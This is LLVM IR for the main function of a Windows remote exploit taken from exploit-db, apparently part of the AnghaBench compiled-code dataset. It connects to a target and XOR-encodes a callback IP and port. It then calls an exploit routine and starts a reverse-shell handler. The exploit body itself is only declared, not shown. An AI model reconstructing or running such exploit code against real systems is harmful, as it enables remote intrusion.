; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_945.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_945.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.sockaddr_in = type { i32 }
%struct.hostent = type { i32 }
%struct.TYPE_3__ = type { i32, i32, i32, i32, i32 }

@.str = private unnamed_addr constant [6 x i8] c"clear\00", align 1
@.str.1 = private unnamed_addr constant [22 x i8] c"exploitation FAILED!\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i64, align 8
  %9 = alloca i16, align 2
  %10 = alloca i16, align 2
  %11 = alloca %struct.sockaddr_in, align 4
  %12 = alloca %struct.hostent*, align 8
  %13 = alloca %struct.TYPE_3__, align 4
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %14 = call i32 @system(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str, i64 0, i64 0))
  %15 = call i32 (...) @header()
  %16 = load i32, i32* %3, align 4
  %17 = load i8**, i8*** %4, align 8
  %18 = call i32 @parse_arguments(i32 %16, i8** %17, %struct.TYPE_3__* %13)
  %19 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %13, i32 0, i32 4
  %20 = load i32, i32* %19, align 4
  %21 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %13, i32 0, i32 3
  %22 = load i32, i32* %21, align 4
  %23 = call i32 @connect_to_remote_host(i32 %20, i32 %22)
  store i32 %23, i32* %5, align 4
  %24 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %13, i32 0, i32 2
  %25 = load i32, i32* %24, align 4
  %26 = call i64 @inet_addr(i32 %25)
  %27 = xor i64 %26, 2576980377
  store i64 %27, i64* %8, align 8
  %28 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %13, i32 0, i32 0
  %29 = load i32, i32* %28, align 4
  %30 = call zeroext i16 @htons(i32 %29)
  %31 = zext i16 %30 to i32
  %32 = xor i32 %31, 39321
  %33 = trunc i32 %32 to i16
  store i16 %33, i16* %10, align 2
  %34 = load i32, i32* %5, align 4
  %35 = load i64, i64* %8, align 8
  %36 = load i16, i16* %10, align 2
  %37 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %13, i32 0, i32 1
  %38 = load i32, i32* %37, align 4
  %39 = call i32 @exploit(i32 %34, i64 %35, i16 zeroext %36, i32 %38)
  %40 = icmp eq i32 %39, 1
  br i1 %40, label %41, label %44

41:                                               ; preds = %2
  %42 = call i32 @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.1, i64 0, i64 0))
  %43 = call i32 @exit(i32 1) #3
  unreachable

44:                                               ; preds = %2
  %45 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %13, i32 0, i32 0
  %46 = load i32, i32* %45, align 4
  %47 = call i32 @start_reverse_handler(i32 %46)
  ret i32 0
}

declare dso_local i32 @system(i8*) #1

declare dso_local i32 @header(...) #1

declare dso_local i32 @parse_arguments(i32, i8**, %struct.TYPE_3__*) #1

declare dso_local i32 @connect_to_remote_host(i32, i32) #1

declare dso_local i64 @inet_addr(i32) #1

declare dso_local zeroext i16 @htons(i32) #1

declare dso_local i32 @exploit(i32, i64, i16 zeroext, i32) #1

declare dso_local i32 @printf(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @start_reverse_handler(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
